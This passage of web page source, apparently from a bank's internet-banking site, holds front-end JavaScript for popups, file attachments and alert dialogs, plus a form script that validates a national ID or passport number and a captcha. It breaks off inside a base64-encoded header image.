parent.popupWindow = null; } } catch (e) { } popup_win_name = 'popup_'+parent.iduser; popup_txnid = p_txnid; popup_seq = p_seqno; parent.popupWindow = window.open ("defaultflexcubepopup.html",popup_win_name, p_feature) } //-------------------------------------------------------------------------- function fnOnBodyUnload () { try { if (parent.popupWindow) { parent.popupWindow.close();//closing existing pop up window. } } catch (e) { } } //-------------------------------------------------------------------------- function isTxnInRole (p_txn){ var p_success = false; for (var i=0;i < arr_grp__txnid.length; i++){ if (arr_grp__txnid [i] == p_txn) { p_success=true; } } return p_success; } //------------------------------------------------------------------------------ function view_attached_docs() { SendTxnRequest('03','VAI'); } //------------------------------------------------------------------------------ function fnAttachDocuments(p_tableid,p_rowid,p_buttonid) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=no,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; document.frmmain.target = "txn"; document.frmmain.fldSessionId.value = parent.idsession; //document.frmmain.fldRequestId.value="RRALI02"; document.frmmain.fldSectionId.value="RRALI02"; document.frmmain.fldServiceType.value="ALI"; document.frmmain.fldtableid.value=p_tableid; document.frmmain.fldrowid.value=p_rowid; document.frmmain.fldbtnflag.value=p_buttonid; call_Popup ( features , 'ALI' , '02' , 'txn' ); document.frmmain.target = ""; } //------------------------------------------------------------------------------ function fnAttachFilesForMailBox(p_tableid,p_rowid,p_buttonid) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=no,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; document.frmmain.target = "txn"; document.getElementById('fldSessionId').value = parent.idsession; document.getElementById('fldSectionId').value = "RRIMS92"; document.getElementById('fldServiceType').value = "IMS"; document.getElementById('fldtableid').value = p_tableid; document.getElementById('fldrowid').value = p_rowid; document.getElementById('fldbtnflag').value = p_buttonid; call_Popup ( features , 'IMS' , '92' , 'txn' ); document.frmmain.target = ""; } //------------------------------------------------------------------------------ function fnOriginationsPopUpOpen(p_reqid,p_txnid,p_iddevice,p_features) { var idrequest = 'RR'+p_txnid+p_reqid; document.frmmain.target = "txn"; document.frmmain.fldSessionId.value = parent.idsession; document.frmmain.fldSectionId.value = idrequest; document.frmmain.fldServiceType.value= "ORG"; document.frmmain.fldDataId.value = dataid; call_Popup ( p_features , p_txnid , p_reqid , 'txn' ); document.frmmain.target = ""; return; } //------------------------------------------------------------------------------ function fnEreceiptsPopUpOpen(idRequestNum) { var height = window.innerHeight; var width = window.innerWidth; var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no" + ",height=" + (0.9*height) + ",width=" + (0.9 * width) + ",top=" + (height * 0.1) + ",left=" + (width * 0.1) + ",status=yes"; if(idRequestNum){ call_Popup ( features , 'ERC' , idRequestNum , 'txn' ); } else{ call_Popup ( features , 'ERC' , '01' , 'txn' ); } } //------------------------------------------------------------------------------ function fnRemove(p_sectionid,p_requestid) { document.frmmain.target=""; document.frmmain.flddelrefno.value =""; document.frmmain.fldfilerefno.value =""; for (var i=0;i < document.frmmain.elements.length;i++) { if (document.frmmain.elements[i].type=='checkbox' && document.frmmain.elements[i].name=="fldattachedfiles" ) { if(document.frmmain.elements[i].checked==false) { document.frmmain.fldfilerefno.value = document.frmmain.elements[i].value+'~'+document.frmmain.fldfilerefno.value; } if(document.frmmain.elements[i].checked==true) { flgbtn=true; document.frmmain.flddelrefno.value = document.frmmain.elements[i].value+'~'+document.frmmain.flddelrefno.value; } } } if(flgbtn==false){ alert("Please select a file to remove"); return false; } document.frmmain.fldSectionId.value = p_sectionid ; //document.frmmain.fldPrevRequestId.value = p_prevrequestid; return SendTxnRequest(p_requestid.substring(5,7),p_requestid.substring(2,5)); } //----------------------------------------------------------------------------------------- function checkForAuditLogFrame() { var l_auditWindName = self.name; // setting self.name in l_auditWindName // compare it with frame self.name if it matches with SSR or VAL frame name // put modal window. if(l_auditWindName=="frame_audit_txn"){ if(document.getElementById("divsession")) { document.getElementById("divsession").style.display = ""; } } } //----------------------------------------------------------------------------- function displayBackwardCompatibilityStatusMessage () { return; } //----------------------------------------------------------------------------- function fnToggleComponent ( toggledivid , urlimageopen , urlimageclose ) { var sectionId = document.getElementById (toggledivid); if (sectionId == null) { return; } var imgSrc = document.getElementById ("img_" + toggledivid); if (imgSrc == null) { return; } if (sectionId.style.display == '' || sectionId.style.display == 'block') { sectionId.style.display = 'none'; imgSrc.src = urlimageclose; } else { sectionId.style.display = ''; imgSrc.src = urlimageopen; } } //----------------------------------------------------------------------------- //----------------------------------------------------------------------------------------- function custom_alert(output_msgs, title_msg) { var out_msg; if ($.isArray (output_msgs)) { if (output_msgs.length > 1) { out_msg = "<ul><li>"; for (i = 0; i < output_msgs.length; i++) { out_msg += output_msgs [i]; if (i + 1 != output_msgs.length) { out_msg += "</li><li>"; } } out_msg = "</li></ul>"; } else { out_msg = output_msgs [0]; } } else { out_msg = output_msgs; } $("<div></div>").html(out_msg).dialog({ title: title_msg, resizable: false, modal: true, buttons: { "Ok": function() { $( this ).dialog( "close" ); } } }); } //------------------------------------------------------------------------ //------------------------------------------------------------- function staticwindow_open ( p_formObj , p_windowTitleText , p_id ) { if (!p_formObj){ p_formObj = document.frmEntitySwitch; } var window_name = 'process_' + p_id; var frm_action; var l_windowObj = window.open ( '' , window_name , 'toolbar=0,location=0,directories=0,status=1,menubar=0,scrollbars=1,resizable=0,left=0,top=0,width=' + window.screen.width + ',height=' + window.screen.height ); l_windowObj.moveTo(0, 0); l_windowObj.resizeTo(screen.width, screen.height); p_formObj.target = window_name; if (p_formObj.title || p_formObj.title != '') { p_formObj.title.value = p_windowTitleText; } else { var l_inputTitle = document.createElement ('input'); l_inputTitle.type = 'hidden'; l_inputTitle.name = 'title'; l_inputTitle.value = p_windowTitleText; p_formObj.appendChild (l_inputTitle); } p_formObj.fldRequestId.value = p_id; frm_action = p_formObj.action; p_formObj.action = "process.jsp" if (l_windowObj) { l_windowObj.focus (); } p_formObj.submit (); p_formObj.action = frm_action; } //---------------------------------------------------------------------------- function fnGetAppLayRelWidth () { return l_appLayWidth - 25; } //---------------------------------------------------------------------------- </script><div id="divsession" class="modalWhitebackground" style="display:none" ></div><div id="errorTab" style="display:none;height:auto;width:100%;cursor:hand; " ></div><div id="printWarning" class="noPrintWarning" ><div class="iconHolder warningMsg" ></div><div class="alertmsgbox" ></div></div><div id="dialog-modal-error" title="Messages" ><table id="error-dialog-table" style="width:100%;display:none" cellpadding="1" cellspacing="1" ></table></div><html lang="en" ><head><!--[if lte IE 7]><link rel="stylesheet" href="https://ib.mcb.mu/T001/css/eng_01.css" type="text/css" /><![endif]--><![if (!IE) | (gte IE 8)]><link rel="stylesheet" href="https://ib.mcb.mu/T001/css/eng_01.uri.css" type="text/css" /><![endif]><meta name="viewport" content="width=device-width; initial-scale=1; minimal-ui" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" ></meta><meta HTTP-EQUIV="no-cache" ></meta><title></title><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/Ajax.js" ></script><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/common.js" ></script><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/rsa_compiled.js" ></script><script language="JavaScript" type="text/JavaScript" > function fnBack(){ $("input[type='button']").prop('disabled',true); document.frmmain.fldRequestId.value='RRUSR11'; document.frmmain.submit(); } function fnSubmit(){ $("input[type='button']").prop('disabled',true); if($("#fldnicno").prop("checked")) { if($.trim($("#fldIdentificationNoNic").val())=='' || $.trim($("#fldIdentificationNoNic").val()).length !=$("#fldIdentificationNoNic").val().length ||$.trim($("#fldIdentificationNoNic").val()).length < 14 || /\s/g.test($('#fldIdentificationNoNic').val())){ $("#fldIdentificationNoNicInline").css("display","block"); $("#fldIdentificationNoNic").addClass("input-error"); $("input[type='button']").prop('disabled',false); return false; } else{ $("#fldIdentificationNoNicInline").css("display","none"); $("#fldIdentificationNoNic").removeClass("input-error"); } } else if($("#fldpassportno").prop("checked")) { if($.trim($("#fldIdentificationNoPass").val())=='' || $.trim($("#fldIdentificationNoPass").val()).length !=$("#fldIdentificationNoPass").val().length ||$.trim($("#fldIdentificationNoPass").val()).length < 5 || /\s/g.test($('#fldIdentificationNoPass').val())){ $("#fldIdentificationNoPassInline").css("display","block"); $("#fldIdentificationNoPass").addClass("input-error"); $("input[type='button']").prop('disabled',false); return false; } else{ $("#fldIdentificationNoPassInline").css("display","none"); $("#fldIdentificationNoPass").removeClass("input-error"); } } if(validateCaptcha()){ document.frmmain.fldRequestId.value='RRUSR03'; document.frmmain.submit(); } else{ return false; } } function toggleIdentificationNo(selradio) { $("#fldIdentificationNoNic").val(''); $("#fldIdentificationNoPass").val(''); $("#fldIdentificationNoPassInline").css("display","none"); $("#fldIdentificationNoPass").removeClass("input-error"); $("#fldIdentificationNoNicInline").css("display","none"); $("#fldIdentificationNoNic").removeClass("input-error"); if(selradio.id=='fldnicno'){ $("#fldIdentificationNoPass").prop('disabled',true); $("#fldIdentificationNoPass").css('background',"#f0f0f0 none repeat scroll 0 0"); $("#fldIdentificationNoNic").prop('disabled',false); $("#fldIdentificationNoNic").css('background',""); } else if(selradio.id=='fldpassportno'){ $("#fldIdentificationNoNic").prop('disabled',true); $("#fldIdentificationNoNic").css('background',"#f0f0f0 none repeat scroll 0 0"); $("#fldIdentificationNoPass").prop('disabled',false); $("#fldIdentificationNoPass").css('background',""); } } function isValid(evt) { var charCode = (evt.which) ? evt.which : evt.keyCode; var retVal = ((charCode >= 48 && charCode <= 57) || ///0-9 Number ASCII (48~57) (charCode >= 65 && charCode <= 90) || ///A~Z Upper Case Alphabet ASCII (65~90) (charCode >= 97 && charCode <= 122) ///a~z Lower Case Alphabet ASCII (97~122) ); if (retVal ==false) { return false; } else { return true; } } </script></head><body class="workarea" onload="getCaptchaImage();" style="width:auto;" ><style> #headerWrapper { background: #fff; border-bottom: 1px solid #ececec; position: absolute; width: 100%; height: 72px; top: 0; left: 0; margin: 0; padding: 0; border: 0; } #header { padding: 0; position: relative; width: 960px; margin: 0 auto; border: 0; } #_topMenu { width: 100%; height: 70px; background-repeat: no-repeat; background-image: url(data:image/jpeg;base64,/9j/4QAYRXhpZgAASUkqAAgAAAAAAAAAAAAAAP/sABFEdWNreQABAAQAAABkAAD/4QMvaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLwA8P3hwYWNrZXQgYmVnaW49Iu+7vyIgaWQ9Ilc1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCI/PiA8eDp4bXBtZXRhIHhtbG5zOng9ImFkb2JlOm5zOm1ldGEvIiB4OnhtcHRrPSJBZG9iZSBYTVAgQ29yZSA1LjYtYzAxNCA3OS4xNTY3OTcsIDIwMTQvMDgvMjAtMDk6NTM6MDIgICAgICAgICI+IDxyZGY6UkRGIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyI+IDxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiIHhtbG5zOnhtcD0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLyIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bXA6Q3JlYXRvclRvb2w9IkFkb2JlIFBob3Rvc2hvcCBDQyAyMDE0IChXaW5kb3dzKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo5MzUzN0VBQzI3RTQxMUU2OEZFQjgzQ0VFNDc0MzI1NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo5MzUzN0VBRDI3RTQxMUU2OEZFQjgzQ0VFNDc0MzI1NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjkzNTM3RUFBMjdFNDExRTY4RkVCODNDRUU0NzQzMjU2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjkzNTM3RUFCMjdFNDExRTY4RkVCODNDRUU0NzQzMjU2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+/+4ADkFkb2JlAGTAAAAAAf/bAIQAAQEBAQEBAQEBAQEBAQEB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